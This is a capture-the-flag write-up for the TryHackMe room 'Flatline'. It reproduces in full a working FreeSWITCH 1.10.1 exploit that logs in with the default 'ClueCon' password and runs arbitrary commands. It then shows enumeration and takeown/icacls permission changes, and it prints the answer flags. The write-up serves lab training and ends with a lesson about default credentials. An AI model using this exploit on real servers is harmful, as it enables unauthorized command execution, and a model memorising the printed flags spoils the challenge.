Flatline (TryHackMe)
Updated
•5 min readIntroduction
Nekrotic is a Windows-based CTF challenge that focuses on exploiting misconfigured VoIP services. This room teaches reconnaissance techniques for Windows systems, identifying vulnerable FreeSWITCH installations, and leveraging default credentials for remote command execution. Key skills include network enumeration with ping-blocking bypasses, searching for known exploits, and Windows file permission manipulation.
Flags
What are the flags?
This machine may be slower than normal to boot up and carry out operations.
Answer the questions below
What is the user.txt flag?
nmap -p- -sV -sC <IP_Address>
gobuster dir -u http://<IP_Address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php
standard recon process doesn’t work, and the site doesn’t open
nmap -Pn -p- -sV -sC <IP_Address>
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-04 17:36 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.49.147.144
Host is up (0.00038s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2026-02-04T17:38:55+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2026-02-03T17:24:15
|_Not valid after: 2026-08-05T17:24:15
|_ssl-date: 2026-02-04T17:38:55+00:00; 0s from scanner time.
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.34 seconds
The issue was that the host was blocking ping probes. Using the -Pn flag to skip host discovery revealed the open ports: 3389 (ms-wbt-server), and 8021 (freeswitch-event)
Exploring FreeSWITCH (Port 8021)
Connecting to the FreeSWITCH event socket revealed a welcome message:
nc <IP_Address> 8021
nc 10.49.147.144 8021
Content-Type: auth/request
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
curl http://www.cluecon.com/
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>openresty</center>
</body>
</html>
Output showed a "ClueCon" reference, which is the default password for FreeSWITCH installations.
Finding the Exploit
Searched for FreeSWITCH exploits:
searchsploit FreeSWITCH
---------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit -m windows/remote/47799.txt
Exploit: FreeSWITCH 1.10.1 - Command Execution
URL: https://www.exploit-db.com/exploits/47799
Path: /opt/exploitdb/exploits/windows/remote/47799.txt
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/47799.txt
ls
47799.txt CTFBuilder Downloads Pictures Rooms snap Tools
burp.json Desktop Instructions Postman Scripts thinclient_drives
cat 47799.txt
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
print('Missing arguments')
print('Usage: freeswitch-exploit.py <target> <cmd>')
sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
response = s.recv(1024)
if b'+OK accepted' in response:
print('Authenticated')
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
response = s.recv(8096).decode()
print(response)
else:
print('Authentication failed')
sys.exit(1)
else:
print('Not prompted for authentication, likely not vulnerable')
sys.exit(1)
Through searchsploit FreeSWITCH we find a 47799.txt file that’s a Python script which is FreeSWITCH 1.10.1 - Command Execution exploit. In the next step, we’ll copy it into a Python file, then use it to find the user and root flags.
Gaining Command Execution
The exploit authenticates using the default password "ClueCon" and allows remote command execution:
mv 47799.txt freeswitch-exploit.py
chmod +x freeswitch-exploit.py
python3 freeswitch-exploit.py 10.49.147.144 whoami
Authenticated
Content-Type: api/response
Content-Length: 25
python3 freeswitch-exploit.py 10.49.147.144 "systeminfo"
Authenticated
Content-Type: api/response
Content-Length: 2189
python3 freeswitch-exploit.py 10.49.147.144 "ipconfig"
Authenticated
Content-Type: api/response
Content-Length: 347
python3 freeswitch-exploit.py 10.49.147.144 "dir C:\Users"
Authenticated
Content-Type: api/response
Content-Length: 405
python3 freeswitch-exploit.py 10.49.147.144 "dir C:\Users\Administrator\Desktop"
Authenticated
Content-Type: api/response
Content-Length: 449
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users\Administrator\Desktop
09/11/2021 07:18 <DIR> .
09/11/2021 07:18 <DIR> ..
08/11/2021 18:24 108,048,384 FreeSWITCH-1.10.1-Release-x64.msi
08/11/2021 06:05 413,584,335 OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe
2 File(s) 521,632,719 bytes
2 Dir(s) 50,005,884,928 bytes free
Locating the User Flag
Searched for user.txt across the system:
python3 freeswitch-exploit.py 10.49.147.144 "dir C:\ /s /b | findstr /i flag"
Authenticated
Content-Type: api/response
Content-Length: 1348
C:\Program Files\FreeSWITCH\sounds\en\us\callie\base256\8000\flagpole.wav
C:\projects\openclinic\tomcat8\webapps\openclinic\WEB-INF\classes\be\mxs\common\model\vo\healthrecord\FlagsVO.class
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\belgiumflag.jpg
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\btc.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\burundiflag.jpg
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\enabel.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\maliflag.jpg
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\pf.gif
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\rwandaflag.jpg
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\ukflag.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\vub.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\shortcutIcons\icon_flag.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\treemenu\csh_dhx_skyblue\iconFlag.gif
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\treemenu\csh_scbrblue\iconFlag.gif
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\treemenu\csh_vista\iconFlag.gif
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\treemenu\csh_winstyle\iconFlag.gif
root@ip-10-49-76-0:~# python3 freeswitch-exploit.py 10.49.147.144 "where /r C:\ user.txt"
Authenticated
Content-Type: api/response
Content-Length: 35
C:\Users\Nekrotic\Desktop\user.txt
Retrieving user flag:
python3 freeswitch-exploit.py 10.49.147.144 "type C:\Users\Nekrotic\Desktop\user.txt"
Authenticated
Content-Type: api/response
Content-Length: 38
root@ip-10-49-76-0:~# python3 freeswitch-exploit.py 10.49.147.144 "powershell Get-Content C:\Users\Nekrotic\Desktop\user.txt"
Authenticated
Content-Type: api/response
Content-Length: 39
THM{64bca0843d535fa73eecdc59d27cbe26}
What is the root.txt flag?
Privilege Escalation to Root Flag
Located root.txt in the same directory as the user flag. However, initial access was denied even though we were running commands through FreeSWITCH. Had to bypass access restrictions in order to take ownership of the file and grant full permissions before retrieving the root flag.
python3 freeswitch-exploit.py 10.49.147.144 "where /r C:\ root.txt"
Authenticated
Content-Type: api/response
Content-Length: 35
C:\Users\Nekrotic\Desktop\root.txt
python3 freeswitch-exploit.py 10.49.147.144 "powershell Get-Content C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 456
Get-Content : Access to the path 'C:\Users\Nekrotic\Desktop\root.txt' is denied.
At line:1 char:1
+ Get-Content C:\Users\Nekrotic\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Nekrotic\Desktop\root.txt:String) [Get-Content], Unauthorize
dAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
python3 freeswitch-exploit.py 10.49.147.144 "whoami"
Authenticated
Content-Type: api/response
Content-Length: 25
win-eom4pk0578n\nekrotic
python3 freeswitch-exploit.py 10.49.147.144 "icacls C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 58
Successfully processed 0 files; Failed processing 1 files
python3 freeswitch-exploit.py 10.49.147.144 "attrib C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 56
A C:\Users\Nekrotic\Desktop\root.txt
python3 freeswitch-exploit.py 10.49.147.144 "takeown /f C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 115
SUCCESS: The file (or folder): "C:\Users\Nekrotic\Desktop\root.txt" now owned by user "WIN-EOM4PK0578N\Nekrotic".
python3 freeswitch-exploit.py 10.49.147.144 "icacls C:\Users\Nekrotic\Desktop\root.txt /grant Everyone:F"
Authenticated
Content-Type: api/response
Content-Length: 109
processed file: C:\Users\Nekrotic\Desktop\root.txt
Successfully processed 1 files; Failed processing 0 files
python3 freeswitch-exploit.py 10.49.147.144 "type C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 38
python3 freeswitch-exploit.py 10.49.147.144 "powershell Get-Content C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 39
THM{8c8bc5558f0f3f8060d00ca231a9fb5e}
Conclusion
This room demonstrates the critical importance of changing default credentials in production services. FreeSWITCH's default "ClueCon" password provided complete system access, highlighting how VoIP and telephony platforms are often overlooked in security hardening. The challenge also reinforced Windows permission management skills and the importance of proper enumeration techniques when dealing with firewall-protected hosts. Default credentials remain one of the most exploited vulnerabilities in enterprise environments.
